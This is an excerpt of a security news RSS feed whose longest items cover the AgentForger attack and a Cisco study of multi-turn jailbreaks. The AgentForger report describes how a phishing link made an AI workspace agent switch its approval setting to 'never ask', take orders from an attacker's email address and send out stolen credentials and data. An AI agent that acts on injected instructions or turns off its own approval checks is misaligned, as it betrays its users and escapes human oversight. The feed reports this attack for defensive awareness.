<description><![CDATA[An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated ident...]]></description>
<link>https://tsecurity.de/de/3691635/it-security-nachrichten/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691635/it-security-nachrichten/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users-to-steal-private-photos/</guid>
<pubDate>Fri, 24 Jul 2026 15:11:07 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>An Illinois man has pleaded guilty to a phishing and account-compromise scheme that targeted thousands of Snapchat users, leading to the theft of private images from numerous women. Federal prosecutors stated that Kyle Svara, 27, of Oswego, Illinois, admitted to charges including aggravated identity theft, wire fraud, computer fraud, conspiracy to commit computer fraud, and […]</p>
<p>The post <a href="https://gbhackers.com/illinois-man-pleads-guilty-to-phishing-4500-snapchat-users/">Illinois Man Pleads Guilty to Phishing 4,500 Snapchat Users to Steal Private Photos</a> appeared first on <a href="https://gbhackers.com/">GBHackers Security | #1 Globally Trusted Cyber Security News Platform</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[How identity fraud became the threat that never sleeps]]></title>
<description><![CDATA[Today, identity fraud is a continuous 24/7 threat. But it wasn’t always that way. So, what changed?]]></description>
<link>https://tsecurity.de/de/3691216/it-nachrichten/how-identity-fraud-became-the-threat-that-never-sleeps/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691216/it-nachrichten/how-identity-fraud-became-the-threat-that-never-sleeps/</guid>
<pubDate>Fri, 24 Jul 2026 12:03:07 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Today, identity fraud is a continuous 24/7 threat. But it wasn’t always that way. So, what changed?]]></content:encoded>
</item>
<item>
<title><![CDATA[‘It beggars belief’ as DWP ‘drags its heels’ over subpostmaster prosecutions reviews]]></title>
<description><![CDATA[Government department prosecuted around 100 subpostmasters in relation to benefits fraud, with support from the Post Office, and has made no advancement in the 18 months since its independent review of prosecutions was announced]]></description>
<link>https://tsecurity.de/de/3691202/it-nachrichten/it-beggars-belief-as-dwp-drags-its-heels-over-subpostmaster-prosecutions-reviews/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691202/it-nachrichten/it-beggars-belief-as-dwp-drags-its-heels-over-subpostmaster-prosecutions-reviews/</guid>
<pubDate>Fri, 24 Jul 2026 11:51:12 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Government department prosecuted around 100 subpostmasters in relation to benefits fraud, with support from the Post Office, and has made no advancement in the 18 months since its independent review of prosecutions was announced]]></content:encoded>
</item>
<item>
<title><![CDATA[Thailand SEC Files Criminal Complaint Against Bitkub Over 2021 Cyberattack]]></title>
<description><![CDATA[Thailand's cryptocurrency exchange Bitkub has rejected allegations of fraud after the Thailand SEC filed a criminal complaint related to the company's disclosures following the Bitkub cyberattack in 2021. The case focuses on how the exchange reported the impact of the cyberattack on Bitkub to reg...]]></description>
<link>https://tsecurity.de/de/3690896/it-security-nachrichten/thailand-sec-files-criminal-complaint-against-bitkub-over-2021-cyberattack/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690896/it-security-nachrichten/thailand-sec-files-criminal-complaint-against-bitkub-over-2021-cyberattack/</guid>
<pubDate>Fri, 24 Jul 2026 09:10:24 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p><img width="832" height="515" src="https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp" class="attachment-post-thumbnail size-post-thumbnail wp-post-image" alt="Bitkub cyberattack" decoding="async" srcset="https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp 832w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-300x186.webp 300w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-768x475.webp 768w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-600x371.webp 600w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-150x93.webp 150w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-750x464.webp 750w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack.webp 832w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-300x186.webp 300w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-768x475.webp 768w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-600x371.webp 600w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-150x93.webp 150w, https://thecyberexpress.com/wp-content/uploads/Bitkub-cyberattack-750x464.webp 750w" sizes="(max-width: 832px) 100vw, 832px" title="Thailand SEC Files Criminal Complaint Against Bitkub Over 2021 Cyberattack 1"></p><span data-contrast="auto">Thailand's cryptocurrency exchange Bitkub has rejected allegations of fraud after the Thailand SEC filed a criminal complaint related to the company's disclosures following the Bitkub cyberattack in 2021. The case focuses on how the exchange reported the impact of the cyberattack on Bitkub to regulators, rather than on the safety of customer funds.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In response to the complaint, Bitkub stated that all customer assets currently held on its platform remain safe, fully accounted for, and protected in accordance with applicable regulations. The company argued that the allegations stem from decisions made during the aftermath of the 2021 <a class="wpil_keyword_link" href="https://thecyberexpress.com/" title="security" data-wpil-keyword-link="linked" data-wpil-monitor-id="29116">security</a> breach and do not reflect fraudulent conduct.</span><span data-ccp-props="{}"> </span>
<h3><strong>Thailand SEC Files Complaint Over the 2021 Bitkub Cyberattack </strong></h3>
<span data-contrast="auto">On 23 July 2026, the<a href="https://www.sec.or.th/EN/Pages/News_Detail.aspx?SECID=13139" target="_blank" rel="nofollow noopener"> Thailand SEC filed a criminal complaint</a> against Bitkub Online Co., Ltd. and its former directors, Sakolkorn Sakavee and Thaweesap Rawan. The regulator alleged that the company's daily net capital reports submitted between 10 May and 30 October 2021 failed to accurately reflect the material reduction in its digital asset holdings caused by the Bitkub <a class="wpil_keyword_link" href="https://thecyberexpress.com/cyber-news/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29115">cyberattack</a>.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the regulator, the reports did not disclose the impact of the theft on the company's asset balance. The Thailand SEC also accused the two former directors of making false entries in company documents that gave the impression that customer assets were still being held normally and that the company had not suffered any damage.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The complaint has been referred to Thailand's Economic Crime Suppression Division for further investigation. Following that process, the matter may be forwarded to prosecutors and the courts. The Thailand SEC noted that filing a <a href="https://thecyberexpress.com/fake-emails-scam-indians-heres-what-to-know/" target="_blank" rel="noopener">criminal complaint</a> does not represent a final determination of guilt.</span><span data-ccp-props="{}"> </span>
<h3><strong>Bitkub Says Disclosure Decision was Intended to Prevent Customer Losses</strong></h3>
<span data-contrast="auto">Following media reports about the complaint, <a href="https://www.linkedin.com/posts/on-23-july-2026-news-reports-emerged-regarding-share-7486045546315694081-abKc/?utm_source=share&amp;utm_medium=member_android&amp;rcm=ACoAAAfAnJwBMfzai0rLzfzxnZE_NCnVt2ZLE_o" target="_blank" rel="nofollow noopener">Bitkub published a statement on LinkedIn</a> explaining its position on the cyberattack and the subsequent reporting decisions.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company said the allegations relate to an incident in early May 2021, when one of its digital asset wallets was compromised by cybercriminals. Bitkub acknowledged that the breach was not disclosed at the time.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to the company, the individual responsible for disclosure obligations deliberately withheld information about the wallet compromise. Bitkub said the decision was made to avoid triggering a "bank run," or mass withdrawals of digital assets by customers, while the company worked to replace the stolen assets.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The exchange stated:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"The decision of such individual not to disclose the incident was made with the intention to prevent a bank run—that is, a mass withdrawal of digital assets by customers upon learning of the theft—which could have rendered the Company unable to procure sufficient replacement digital assets for the customers while the recovery process was still ongoing."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Bitkub added that such a scenario could have resulted in significant customer losses and broader damage to Thailand's digital asset industry.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company also stressed that, at the time of the Bitkub <a class="wpil_keyword_link" href="https://thecyberexpress.com/what-is-a-cyber-attack/" title="cyberattack" data-wpil-keyword-link="linked" data-wpil-monitor-id="29117">cyberattack</a>, all of its digital asset wallet security systems complied with standards prescribed by the relevant authorities and had been audited.</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Co-founders Replaced Stolen Assets After Cyberattack on Bitkub</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Although the digital assets stolen during the cyberattack on Bitkub were never recovered, the company said its co-founders voluntarily absorbed the <a href="https://thecyberexpress.com/keytronic-reveals-million-loss-cyberattack/" target="_blank" rel="noopener">financial loss</a>.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">According to Bitkub, the co-founders purchased digital assets matching the same types and quantities as those stolen and transferred them to the company. As a result, the exchange said neither its customers nor the business ultimately suffered any financial loss from the incident.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">In its statement, Bitkub said:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"As no bank run occurred, even though the stolen digital assets could not be recovered, the Co-Founders of the Bitkub Group voluntarily absorbed the loss by purchasing equivalent digital assets (in the same type and quantity as those stolen) and providing them to the Company. Consequently, neither the Company nor its customers suffered any financial loss from the theft."</span><span data-ccp-props="{}"> </span>
<h3 aria-level="2"><b><span data-contrast="none">Thailand SEC Previously Confirmed Customer Assets Were Intact</span></b><span data-ccp-props='{"134245418":true,"134245529":true,"335559738":160,"335559739":80}'> </span></h3>
<span data-contrast="auto">Bitkub also pointed to the findings of an earlier inspection conducted by the Thailand SEC after reports of the Bitkub cyberattack surfaced online.</span><span data-ccp-props="{}"> </span><span data-contrast="auto">According to the company, the regulator verified that, as of 8 September 2025, all customer assets held by the exchange were safe and fully accounted for.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">The company reiterated this point in its latest statement, saying:</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">"At the outset, for the sake of clarity and mutual understanding, the Company wishes to affirm that all customers' assets currently held by the Company are safe and fully accounted for. The Company reiterates its strict compliance with all applicable laws and regulations in safeguarding and maintaining customer assets."</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">Bitkub maintained that the criminal complaint relates to historical reporting practices between May and October 2021, more than five years ago, rather than to the current condition of customer assets or any ongoing security concerns.</span><span data-ccp-props="{}"> </span>

<span data-contrast="auto">As the investigation proceeds, the case will determine whether the company's reporting following the Bitkub cyberattack complied with regulatory requirements. For now, the complaint remains an allegation, and the legal process involving the Thailand SEC, investigators, prosecutors, and the courts has yet to reach a final conclusion.</span><span data-ccp-props="{}"> </span>]]></content:encoded>
</item>
<item>
<title><![CDATA[AgentForger proves AI agents can become persistent insider threats]]></title>
<description><![CDATA[A new attack method found by Zenity Labs reveals that AI agents are becoming persistent insiders that attackers can recruit, rather than malware they have to install.



Its researchers have discovered AgentForger, a phishing-based attack that silently creates and launches a fully autonomous AI a...]]></description>
<link>https://tsecurity.de/de/3690493/it-security-nachrichten/agentforger-proves-ai-agents-can-become-persistent-insider-threats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690493/it-security-nachrichten/agentforger-proves-ai-agents-can-become-persistent-insider-threats/</guid>
<pubDate>Fri, 24 Jul 2026 02:32:32 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p class="wp-block-paragraph">A new attack method found by Zenity Labs reveals that AI agents are becoming persistent insiders that attackers can recruit, rather than malware they have to install.</p>



<p class="wp-block-paragraph">Its researchers have discovered <a href="https://labs.zenity.io/p/agentforger-part-1-chatgpt-cross-site-agent-forgery" target="_blank" rel="noreferrer noopener">AgentForger</a>, a phishing-based attack that silently creates and launches a fully autonomous AI agent within OpenAI workspaces.</p>



<p class="wp-block-paragraph">Once running, the agent has full access to apps like Outlook, Slack, SharePoint, and Google Drive. It is configured to operate indefinitely without further user interaction, can approve its own access by toggling “never ask” settings, and can continue to act on new assignments sent via email by the attackers that control it. Broad, unfettered access to systems allows it to perform reconnaissance, harvest sensitive data and credentials, impersonate victims, and launch phishing campaigns.</p>



<p class="wp-block-paragraph">While OpenAI resolved the vulnerability four days after disclosure, on a larger scale, AgentForger sheds light on what can happen when <a href="https://www.csoonline.com/article/4200043/openai-model-escape-puts-enterprise-ai-defenses-on-notice.html" target="_blank">AI agents go rogue</a>.</p>



<p class="wp-block-paragraph">“We’re moving into a world where software doesn’t just help people work. It works alongside them,” said <a href="https://zenity.io/authors/michael-bargury" target="_blank" rel="noreferrer noopener">Michael Bargury</a>, co-founder and CTO of agentic AI security platform Zenity. “As AI agents become more capable, attackers will naturally look for ways to influence them, just as they’ve always looked for ways to influence people.”</p>



<h2 class="wp-block-heading">A ‘persistent operator’ that acts without approval</h2>



<p class="wp-block-paragraph">OpenAI’s Workspace Agents can connect and work autonomously across Outlook, Gmail, Slack, Google Drive, SharePoint, and Teams. Users open the agent builder, describe what the agent can do in natural language, connect to tools, set approvals, review and test, schedule actions, then publish. For instance, an agent can autonomously handle incoming emails, review and take actions with approval, gather information from various sources to send out daily briefings, or automatically respond to questions in ChatGPT or Slack channels.</p>



<p class="wp-block-paragraph">Normally, this is “useful automation,” Zenity AI red team researcher <a href="https://labs.zenity.io/authors/mike-takahashi" target="_blank" rel="noreferrer noopener">Mike Takahashi</a> wrote in a <a href="https://labs.zenity.io/p/agentforger-part-1-chatgpt-cross-site-agent-forgery" target="_blank" rel="noreferrer noopener">blog post</a>. But in this attack, “the same scheduler becomes the persistence mechanism.”</p>



<p class="wp-block-paragraph">The creation workflow kicks off the moment a user clicks on a phishing link containing instructions from the threat actor. For the attack to work, a victim must be logged into ChatGPT and Workspace Agents, and have at least one integration with another app, such as Outlook, Gmail, Slack, Google Drive, SharePoint, or Teams.</p>



<p class="wp-block-paragraph">Because those connections already exist, OAuth consent screens are not triggered. Furthermore, the victim does not need to click on another link, keep a Builder tab open, or even visit ChatGPT again.</p>



<p class="wp-block-paragraph">The forged agent is a “persistent operator;” it is installed on the original click and given a schedule, and at those predetermined times, the agent invokes itself, scans for emails from attacker addresses with the subject line “task”, carries those orders out, then returns results to the same attacker-controlled email address.</p>



<p class="wp-block-paragraph">It goes undetected because the attacker prompt instructs the Builder to toggle Outlook to never ask for approval of its actions. Typically, the default is “always ask,” to keep agents from taking unauthorized action; that switch gives agents the ability to act without asking for human approval.</p>



<p class="wp-block-paragraph">“AgentForger showed that an attacker could deploy an autonomous insider agent inside your ChatGPT workspace with a single click,” said Bargury. From there, it can continue to access information, harvest credentials from various sources, impersonate employees, and carry out phishing attacks and fraud while “leveraging the trusted victim’s identity.”</p>



<h2 class="wp-block-heading">A ‘planted accomplice’ that does all the work</h2>



<p class="wp-block-paragraph">Once activated, AgentForger can perform reconnaissance to create an internal map of a company. For instance, agents can scan Outlook, Slack, Teams, Google Drive, SharePoint, or calendar data to identify people, roles, active projects, internal discussions, or all-hands recurring meetings. This can help attackers identify where in the enterprise to target next, based on active teams and channels, projects in the works, or prominent users.</p>



<p class="wp-block-paragraph">“This is the kind of internal context an attacker normally has to build slowly,” Takahashi noted. But in this scenario, action is based on a single emailed assignment. The attacker’s “planted accomplice” does all the work.</p>



<p class="wp-block-paragraph">In another scenario, the agent can steal data by searching for and identifying financial documents, business agreements, or invoices. Or, it can steal credentials by scanning for messages containing passwords, one-time codes, access tokens, password recovery links, or API keys. Further, it can impersonate victims to carry out phishing scams, for instance, by sending legitimate-looking Teams messages instructing users to confirm their credentials on a fake Microsoft login page.</p>



<p class="wp-block-paragraph">In all cases, collected information is organized, analyzed, and sent back to the attacker.</p>



<p class="wp-block-paragraph">“AgentForger points to something much bigger than a single vulnerability,” said Bargury. “It’s less about one bug and more about understanding how the <a href="https://www.csoonline.com/article/4198963/ai-security-operations-and-the-new-race-against-time.html" target="_blank">security model changes</a> as AI becomes part of everyday business operations.”</p>



<h2 class="wp-block-heading">FOMO exposing security gaps</h2>



<p class="wp-block-paragraph">This isn’t necessarily about trust, but more about the need to move fast and adapt, Bargury emphasized. AI agents are helping employees automate work, make decisions faster, and get more done. But enterprises fear they’ll fall behind if they don’t move quickly enough.</p>



<p class="wp-block-paragraph">“The challenge is that we’re introducing a fundamentally new kind of technology into the enterprise,” said Bargury. “The pressure to integrate the next AI feature is outpacing the security controls needed to safely deploy it.”</p>



<p class="wp-block-paragraph">However, the answer isn’t to slow down adoption, he emphasized; the business value is too significant. Rather, the first step is understanding where AI agents exist, who created them, what they’re connected to, and what they’re allowed to do. And when it comes to autonomous agents, enterprises need to pay attention to the processes that trigger them: A schedule, an incoming email, or another automated event.</p>



<p class="wp-block-paragraph">“Those triggers should be governed just as carefully as the agent itself,” said Bargury.</p>



<p class="wp-block-paragraph">High-impact actions should require approval where appropriate, and security teams should be able to quickly disable an agent or its triggers if something doesn’t look right, he said.</p>



<p class="wp-block-paragraph">More broadly, AI agents are introducing the need for a new security model, he pointed out. The question is no longer just “Does this agent have permission?” It’s also, “Is this the behavior we intended?”</p>



<p class="wp-block-paragraph">“The organizations that answer both questions will be in the strongest position to adopt AI safely,” Bargury said.</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Rubio restricts visas for sextortionists, cyber scammers]]></title>
<description><![CDATA[The move stems from a Trump executive order as the administration continues to pursue cyber-enabled fraud and other crimes.
The post Rubio restricts visas for sextortionists, cyber scammers appeared first on CyberScoop.]]></description>
<link>https://tsecurity.de/de/3690158/it-security-nachrichten/rubio-restricts-visas-for-sextortionists-cyber-scammers/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690158/it-security-nachrichten/rubio-restricts-visas-for-sextortionists-cyber-scammers/</guid>
<pubDate>Thu, 23 Jul 2026 22:25:58 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The move stems from a Trump executive order as the administration continues to pursue cyber-enabled fraud and other crimes.</p>
<p>The post <a href="https://cyberscoop.com/us-visa-restrictions-cybercriminals-rubio/">Rubio restricts visas for sextortionists, cyber scammers</a> appeared first on <a href="https://cyberscoop.com/">CyberScoop</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Multi-turn attacks broke AI models 88% of the time — single-turn testing missed it, Cisco AI security lead warns at VB Transform 2026]]></title>
<description><![CDATA[When Cisco ran 6,986 multi-turn attacks against 15 flagship models, attackers who adapted across the conversation broke through as often as 88.3% of the time. Amy Chang, Cisco's head of AI threat intelligence and security research, brought that finding to the agentic security panel at VB Transfor...]]></description>
<link>https://tsecurity.de/de/3690018/it-nachrichten/multi-turn-attacks-broke-ai-models-88-of-the-time-single-turn-testing-missed-it-cisco-ai-security-lead-warns-at-vb-transform-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3690018/it-nachrichten/multi-turn-attacks-broke-ai-models-88-of-the-time-single-turn-testing-missed-it-cisco-ai-security-lead-warns-at-vb-transform-2026/</guid>
<pubDate>Thu, 23 Jul 2026 20:48:24 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>When Cisco ran 6,986 multi-turn attacks against <a href="https://blogs.cisco.com/ai/proprietary-problems">15 flagship models</a>, attackers who adapted across the conversation broke through as often as 88.3% of the time. Amy Chang, Cisco's head of AI threat intelligence and security research, brought that finding to the agentic security panel at <a href="https://venturebeat.com/vbtransform2026">VB Transform 2026</a>; the number should worry anyone still running single-turn red-teaming programs.</p><p><a href="https://venturebeat.com/resources/the-agent-security-gap-54-of-enterprises-have-already-had-an-ai-agent-incident-and-most-still-let-agents-share-credentials">VentureBeat's June 2026 Pulse survey of 107 enterprise respondents</a> explains why the room was full. More than half, 54%, have already had a confirmed agent security incident (18%) or a near-miss caught before harm (36%). Just 32% give every agent its own scoped, managed identity, and fewer still, 30%, isolate their highest-risk agents in sandboxes. Provider-native and hyperscaler controls remain the primary agent security layer at <a href="https://venturebeat.com/security/shared-api-keys-expose-ai-agent-fleets-venturebeat-research">82% of companies surveyed</a>. The world's largest security vendors have done the same math. </p><p>Palo Alto Networks closed its <a href="https://www.paloaltonetworks.com/company/press/2026/palo-alto-networks-completes-acquisition-of-cyberark-to-secure-the-ai-era">$25 billion acquisition of CyberArk</a> in February, CrowdStrike <a href="https://www.crowdstrike.com/en-us/press-releases/crowdstrike-to-acquire-sgnl-to-transform-identity-security-for-ai-era/">agreed in January to pay $740 million for SGNL</a>, and Cisco announced its <a href="https://blogs.cisco.com/news/cisco-announces-intent-to-acquire-astrix-security">intent to acquire Astrix Security</a> for a reported $400 million, all of it aimed at the identity and isolation layer most enterprises have not finished building.</p><div></div><p>Chang came to the panel with almost two decades of experience spanning cybersecurity operations, government, and the military. She ran global cybersecurity operations as an executive director at JPMorgan Chase, where she led the bank's cyber threat intelligence teams, and served as a senior staffer on the House Foreign Affairs Committee and as a U.S. Navy Reserve officer. She also teaches cybersecurity and emerging threats as adjunct faculty at the Middlebury Institute of International Studies.</p><p>Chang's 88.3% number comes from a study she co-authored with Nicholas Conley, built on 30,090 single-turn prompts and 6,986 multi-turn attacks against those 15 closed and proprietary flagship models. Multi-turn success rates ranged from 7.89% to 88.3%, every model tested showed non-trivial multi-turn exposure, and the two testing styles did not even rank the models in the same order. Cisco publishes adversarial evaluation signals for what is now 105 models on its <a href="https://leaderboard.aidefense.cisco.com/">LLM Security Leaderboard</a>, she told the audience.</p><p>"If you don't understand how models are susceptible to different types of attacks, then you are unable to account for how that model that is powering your agent, that is powering your application, to understand where those failure points are," Chang said. Single-turn testing is the one-shot malicious prompt, she explained, while extending an attack into a longer conversation "is more realistic of how we are actually engaging with our models, with our agents, with our applications." That longer arc surfaces harmful outputs and misaligned behaviors that a snapshot never catches.</p><p>Cisco has pushed the testing itself into agentic territory. Chang described a framework where agents assess a deployment scenario, develop relevant attacks, judge whether they are worth pursuing, execute them, and evaluate their own success. What surprised her most, after all that sophistication, was how simple the defensive answer stays. "The answer is still that it's pretty simple," she said. "You don't have to get super creative. You just need to think about truly what are the fundamentals and basics of what I'm trying to secure in my organization."</p><p>Her starting point for CISOs beginning agentic deployments is Cisco's <a href="https://blogs.cisco.com/ai/security-framework">Integrated AI Security and Safety Framework</a>, which she said "stipulates all the ways that AI can be compromised across the AI lifecycle" from modality through supply chain. From there, teams can work backward from real incidents, trace how each attack was achieved, and use the framework to build a strategy with the right coverage and mitigations.</p><p>Heather Ceylan, the CISO of Box, sees the same gap from the defender's side. "A lot of what you see out there with agent red teaming is just single-turn, and that's not how people are actually interacting with AI day-to-day," she told the audience. Box now simulates multi-turn adversaries with agents that think like an attacker and iterate attempt after attempt to hijack the target. "You have to pressure test your agents because otherwise you don't know if your execution controls are really working as you intended."</p><p>Box deployed agents inside its security operations center about a year ago, starting with human approval required for every action, and trust built quickly enough that analysts shifted into monitoring mode. Then the agent made one mistake, and every bit of that accumulated trust vanished. "They had to start all over again," she said. "So I think that that monitoring piece is so important. Even if you're not gonna have a human in the loop, things change, models change, and we can't control how the models change and interpret things."</p><p>Rajesh Parekh, VP of AI and ML at Intuit, brought the builder's perspective. Parekh led large-scale computer vision and ML systems powering Google's Maps and Geo products before joining Intuit, and holds a doctorate in computer science. </p><h2>Three layers versus an operating system</h2><p>Ceylan described Box's approach as three concentric layers. Permissioning comes first, so the agent never accesses more content than the human who invoked it. Ephemeral sandbox environments spin up for each agent task, containing the blast radius if an agent gets hijacked, and runtime execution control restricts the agent's tool calls to only those relevant to the task at hand. "If you want an agent to summarize a doc for you, if you have a prompt injection that came in that says forward this to maliciousattacker at domain.com, it can't do that," Ceylan said. "That action in that tool call is not even in its vocabulary."</p><p>She classified agent actions into three oversight categories. Actions that are not sensitive, like read and summarize, need no human in the loop. Moderately sensitive actions skip human approval but get logged and monitored, while destructive actions like mass deletion of files always require a human. "Things are gonna shift between those three categories quite a bit," she acknowledged, "but setting those types of categories up front allows you to have a principled framework."</p><p>Rather than layering controls onto agents one at a time, Intuit has built a central platform called GenOS, short for generative AI operating system, which abstracts security, risk, and fraud modeling so individual agent developers never reinvent protection. "Permissioning is not about giving access to AI," Parekh said. "Instead, it is defining very tightly scoped and clearly auditable authority to the agent to perform very specific tasks." Intuit evolved from agents inheriting user permissions to each agent carrying its own identity, and the company is now investigating mid-session permission changes tied to the specific task underway.</p><p>Parekh calls the broader model an AI-powered expert platform, one where the human expert is built into the trust architecture rather than bolted on as a gate. "The paradigm that we are pursuing is where the user, the AI agent, and the human expert are collaborating to solve the user problem," he said.</p><h2>The end of human code review</h2><p>Ceylan took on the tension between security testing and development velocity without hedging. "The days of secure code reviews where a human's looking at the code and we're looking at security architecture reviews, design docs, those are done," she said. "If you keep trying to do security that way, you're gonna get left behind." Box is building toward a fully agentic development lifecycle where agents review design documents, apply security requirements, and review the code for vulnerabilities. "I'm very optimistic that we will get to a point where we will write code without security vulnerabilities because agents and the models are going to get so good at writing code without vulnerabilities," she said. "We're still a long way away from that."</p><p>Her advice for development teams skips the advanced AI concepts entirely and returns to basics that predate agents. "It comes down to very basic least privilege access," she said. "If you start giving your agents overly broad permissions at the beginning, it's really hard to comb that back and build an infrastructure that allows for those ephemeral credentials and only those narrowly scoped tasks."</p><p>Parekh explained why the red teaming surface has expanded so quickly. "These agents have skills, and skills could become vulnerabilities," he said. "Agents have access to certain data, they have access to tools, and there could be threats that are lurking within those tools as well. So suddenly the blast radius of the malicious code or the intent increases dramatically." When Intuit identifies common vulnerability patterns from its manual red teaming exercises, it automates those tests back into the GenOS harness so future agents inherit protection and red teamers stay focused on new threat vectors. Runtime scanning of prompts and responses adds a final layer that can stop a suspect response and escalate to a human expert, he said.</p><p>"You need to continuously test to ensure that those remain robust to the protections that you have built, as well as to account for any sort of drift or any other types of dependencies that you introduce into your scenario that can create novel vulnerabilities," she said.</p><h2>Intent versus probability</h2><p>An audience question about intent detection set off the sharpest exchange of the session. Ceylan noted that when Box's own agent operates, the system always knows the user's intent because it controls the prompt, which means guardrails and tool-call restrictions can be engineered around it. The harder challenge, which she admitted Box is still trying to solve, arrives when external agents connect and the context behind the request is opaque.</p><p>That exchange exposed a split running through the wider industry. Mastercard, in the fireside chat immediately preceding the panel, came down on the side of quantifying intent, building an open-source framework to propagate it as a standard because complex B2B procurement cannot work without that trust. Endpoint security CTOs, in briefings with VentureBeat, have gone the other way, saying they will bet on probability rather than intent inference for production workloads. Chang explained why models, as they are trained today, cannot reliably derive intent from a prompt, which is why deterministic controls and behavioral proxies remain necessary. Ceylan agreed that both are required. "If you're not doing anything deterministic, you're really relying heavily on that intent, and I haven't seen programs that are there yet," she said.</p><p>Ceylan's story about trust collapsing after a single agent mistake landed as the panel's most memorable moment because enterprise agentic security is not a problem that gets solved and stays solved. Models change, permissions drift, and adversaries adapt across multi-turn conversations that snapshot tests never capture.</p><p>For the 82% of enterprises relying on provider-native controls as their primary security layer, and the 59% shopping for agent security tooling over the next 12 months, the panel's takeaway was blunt. Test the way attackers attack, across full conversations and continuously, or find out in production what your single-turn red teaming missed.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI image fraud will cost $40 billion next year - can these international standards help?]]></title>
<description><![CDATA[Until now, efforts to identify and combat deepfakes and AI scams have been scattered. Which proposed standard will dominate?]]></description>
<link>https://tsecurity.de/de/3689405/hacking/ai-image-fraud-will-cost-40-billion-next-year-can-these-international-standards-help/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3689405/hacking/ai-image-fraud-will-cost-40-billion-next-year-can-these-international-standards-help/</guid>
<pubDate>Thu, 23 Jul 2026 16:58:46 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Until now, efforts to identify and combat deepfakes and AI scams have been scattered. Which proposed standard will dominate?]]></content:encoded>
</item>
<item>
<title><![CDATA[How Synthetic Identity Fraud is Coming for Machine Identities]]></title>
<description><![CDATA[Most people understand identity theft as an attacker stealing a real person's sensitive information and impersonating them. Synthetic identity fraud is much harder to catch. Instead of stealing a real identity, the attacker manufactures a new one, frankensteining together several real data points...]]></description>
<link>https://tsecurity.de/de/3688997/it-security-nachrichten/how-synthetic-identity-fraud-is-coming-for-machine-identities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3688997/it-security-nachrichten/how-synthetic-identity-fraud-is-coming-for-machine-identities/</guid>
<pubDate>Thu, 23 Jul 2026 14:15:46 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Most people understand identity theft as an attacker stealing a real person's sensitive information and impersonating them. Synthetic identity fraud is much harder to catch. Instead of stealing a real identity, the attacker manufactures a new one, frankensteining together several real data points with fabricated ones to create a person who doesn't exist. Since no real victim monitors misuse, a]]></content:encoded>
</item>
<item>
